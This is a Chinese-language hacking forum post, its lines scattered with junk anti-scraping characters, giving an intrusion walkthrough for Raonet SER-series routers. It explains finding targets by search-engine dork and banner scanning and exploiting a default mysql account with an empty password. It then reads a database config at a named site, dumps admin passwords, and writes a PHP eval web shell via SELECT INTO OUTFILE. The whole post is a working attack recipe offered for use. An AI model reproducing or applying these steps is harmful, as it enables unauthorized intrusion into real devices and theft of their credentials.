寻找存在漏洞的路由器方法:$ Q4 x6 m9 O: K* g: m5 P0 @
0 q( b* R9 ~, p& Z' t2 G
1:google搜索'Raonet Subscriber Ethernet Router': E( Y4 d( m# p7 U; Z
" ?6 _$ F( d* W2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
8 e; N, l: z. F4 Z B$ O: Z, f
2 q. R `' u% L# }& r; s9 \7 I3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
2 f+ X, S$ j% _& v7 B4 Z" C; F' D: ^- P: z
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......0 s8 D, w9 f7 M0 Q# M5 n2 W L* G
! a0 Y1 @2 q+ U3 I1 T9 _+ @
- L `4 ]9 m& ]5 F% a4 s9 }! k& G" W8 ]
入侵步骤:9 [; v9 H y* _- M. |8 d" c
3 w$ I$ [: }* ]/ ~1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
0 K8 S. a) \$ ` E/ B' I) X3 F7 @/ R5 r( _; w1 I9 T
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc5 g0 `8 ?: h I% T# N; X
3:得到密码后连接,查看GUI管理密码:: F2 q [8 Z# B7 F9 {7 R
use ser_500
Z( ^* Q4 L2 o( o* iselect id,passwd from user;- W+ w3 V; c8 W) e! W5 }4 o
4:通过数据库写入webshell,执行命令:
! c1 Z) L: y r- wuse mysql;
1 T7 Y* L/ }0 ocreate table ok(cmd TEXT);1 A1 V2 Y& s# G p. O5 T
insert into ok values("<?php @eval($_POST[cmd])?>");
; Z/ C+ e; b; B( i* D% bselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";( }9 @# V9 D8 V/ G3 Q l3 e! l
drop table ok;
1 |1 e* m \7 t2 J+ f
. Q) W# H- S1 a! b. _5:连接后门shell.php
7 i7 A5 L# K: o5 f: v' c( u; D+ |4 X* l" T$ Y7 e
6. 搞定!6 B* }5 H- |. q* a Z b/ X% @8 y l# Y
4 U+ @, s! j! | s" ? |